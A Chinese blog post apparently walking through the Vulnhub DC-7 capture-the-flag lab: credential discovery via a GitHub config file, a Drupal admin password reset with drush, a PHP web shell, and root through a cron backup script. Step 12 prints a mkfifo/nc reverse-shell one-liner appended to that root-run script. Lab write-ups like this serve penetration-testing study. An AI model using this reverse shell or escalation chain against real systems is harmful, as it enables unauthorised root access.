DC-7渗透笔记

最新推荐文章于 2022-11-17 11:36:36 发布
最新推荐文章于 2022-11-17 11:36:36 发布
阅读量239 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46274488/article/details/114630313
版权
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。1.发现主机192.168.174.1582.照例nmap扫描,22和80端口都开着呢。3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。4.想扫目录来着,扫了好久都没扫完,就算了。5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹6.没有思路,瞎捣鼓一通之后
摘要由CSDN通过智能技术生成

继续渗透DC-7! 冲!

1.发现主机192.168.174.158

2.照例nmap扫描,22和80端口都开着呢。

3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。

记住下面的DC7USER,要考!!

然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。

4.想扫目录来着,扫了好久都没扫完,就算了。

5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹

6.没有思路,瞎捣鼓一通之后,得到大佬博客指点,还记得上面的考点吗?切入点就是@DC7USER,我是注意到了就是没在意。信息收集不到位。百度一下DC7USER,就有个GitHub地址。

7.在config.php中发现了username和password。

 

 

8.然后通过ssh登录,查看家目录

9.cat mbox,有root发来的邮件,subject是一个定时任务,定时备份,后面跟着脚本路径。

进到目录下可以看到的是 backups.sh是以root用户执行的,但是www-data也有读写权限。

分析一下脚本

大概是在做些站点备份啥的吧。

gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码

drush user-password admin --password="12345" 改变admin的密码

然后进行登录。

10.想找个地方反弹shell/node/add/page在创建basic page 并没有php模块,说是Drupal 8后为了安全,需要将php单独作为一个模块导入。找到模块导入的地址

地址奉上https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

 

添加之后还要去激活!!

这样就可以使用啦。

11.然后写个一句话木马,用蚁剑连接,反弹shell到Kali

12. echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.220.155 1234 >/tmp/f" >> backups.sh

vi好像不太行,不知道为啥

再次反弹shell到kali,等待backups.sh执行完毕后,因为backups.sh是以root执行的,kali也就获得了root权限。

总结

我觉得作者所说的“new concept”是让我们在渗透的过程中可以尝试从社工的角度出发??就是不要局限于网站的功能点的漏洞上。这只是我 个人理解。还学到了在以root权限执行的backups.sh脚本,不仅可以利用!/bin/bash提权,还可以利用反弹shell,利用方式是多种多样的,还是得靠脑洞的经验。

 

 

现代鲁滨逊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机DC-7 渗透笔记
liver100day的博客
06-22 461
靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ 渗透过程 1.信息收集 1.1 信息收集 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 扫描到目标靶机IP地址为:192.168.75.151 也可以使用nmap扫描整个网段,确认存活主机 nmap -T4 192.168.75.0/24 同样扫描出了目标靶机IP
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1219
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-25 1372
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC-7靶机渗透
m0_62008601的博客
06-02 1037
dc-7靶机的渗透过程
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 892
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
渗透测试:DC-7靶机
Ciyaso的博客
08-23 273
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
dc-7 靶机渗透学习
..
03-23 3915
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
DC-DC PCB layout 指导.docx
06-18
7. DC-DC Ton 和 Toff 时的电流路径都应该很短,减少阻抗和寄生电感。 8. 小信号是单点接地,距离比较远,免受大电流开关噪声的影响。 9. 在设计 DC-DC PCB 布局时,需要确保所有反馈连接短而直接,反馈电阻和补偿...
HCIE-DC笔记及面试宝典
09-24
HCIE-DC笔记及面试宝典 HCIE-DC笔记及面试宝典 HCIE-DC笔记及面试宝典 HCIE-DC笔记及面试宝典
DC-7靶机练习
IWANnaaa的博客
11-03 215
DC-7靶场练习
DC-7靶机详细渗透步骤
wwxxss
11-04 661
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1189
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
DC-7靶机渗透测试详细教程
啊醒的博客
05-04 1073
DC-7靶机渗透测试详细教程
DC-7 (drush更改密码)
m0_66299232的博客
11-17 258
10.输入url https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 报错了,确实无语。3.我一直在等他弹shell,没等来 想着估计时间长,看下计划任务,压根没这个任务,用cat命令看了下,立刻就弹shell了。13.把php-reverse-shell.php(github里有)的代码复制下来,换成kali地址即可。7.然后就进入到/var/www/html目录下,用drush命令修改www-data的密码。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
笔记本主板电源设计与DC-DC变换解析
DC-DC变换器在主板电源设计中扮演核心角色,将输入电压转换为主板所需的多种电压等级,如3.3V、5V、1.5V、VCC_CORE和GFX_CORE等。Buck转换器是常见的一种降压转换器,用于减少电压并控制输出纹波电流。选择合适的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值